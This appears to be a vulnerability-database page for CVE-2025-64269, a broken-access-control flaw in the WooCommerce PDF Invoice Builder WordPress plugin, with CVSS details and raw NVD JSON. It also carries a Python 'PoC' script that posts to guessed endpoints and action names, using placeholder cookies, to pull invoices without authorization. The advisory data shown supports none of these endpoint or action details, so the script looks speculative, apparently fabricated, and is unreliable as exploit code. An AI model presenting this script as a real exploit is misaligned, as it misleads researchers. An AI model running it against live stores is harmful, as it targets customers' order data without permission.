Security Vulnerability Report
中文
CVE-2025-64269 CVSS 4.3 MEDIUM

CVE-2025-64269

Published: 2025-11-13 10:15:52
Last Modified: 2026-04-27 16:16:39

Description

Missing Authorization vulnerability in EDGARROJAS WooCommerce PDF Invoice Builder woo-pdf-invoice-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce PDF Invoice Builder: from n/a through <= 1.2.150.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WooCommerce PDF Invoice Builder (woo-pdf-invoice-builder) <= 1.2.150

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64269 PoC - Missing Authorization in WooCommerce PDF Invoice Builder # Affected: WooCommerce PDF Invoice Builder <= 1.2.150 # Type: Broken Access Control / Missing Authorization import requests import sys TARGET_URL = "http://target-wordpress-site.com" # Low-privilege user session or no authentication required COOKIES = { "wordpress_test_cookie": "WP+Cookie+check", "wordpress_logged_in_user": "user_session_token" } def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-64269""" # Common endpoints that might be affected endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/woo-pdf-invoice/v1/invoice", "/?rest_route=/woo-pdf-invoice/v1/generate" ] # Test payload for invoice generation without proper authorization test_payloads = [ { "action": "woo_pdf_invoice_generate", "order_id": "1" }, { "action": "woo_pdf_invoice_download", "invoice_id": "1" } ] for endpoint in endpoints: for payload in test_payloads: try: response = requests.post( f"{TARGET_URL}{endpoint}", data=payload, cookies=COOKIES, timeout=10 ) # Check for successful response indicating missing auth if response.status_code == 200 and len(response.content) > 0: if "pdf" in response.headers.get("Content-Type", "").lower() or \ "invoice" in response.text.lower(): print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Payload: {payload}") print(f"[+] Response Content-Length: {len(response.content)}") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] Target may not be vulnerable or endpoint not found") return False if __name__ == "__main__": print("CVE-2025-64269 PoC - WooCommerce PDF Invoice Builder") print("=" * 60) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64269", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:52.260", "lastModified": "2026-04-27T16:16:39.153", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in EDGARROJAS WooCommerce PDF Invoice Builder woo-pdf-invoice-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce PDF Invoice Builder: from n/a through <= 1.2.150."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-pdf-invoice-builder/vulnerability/wordpress-woocommerce-pdf-invoice-builder-plugin-1-2-150-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}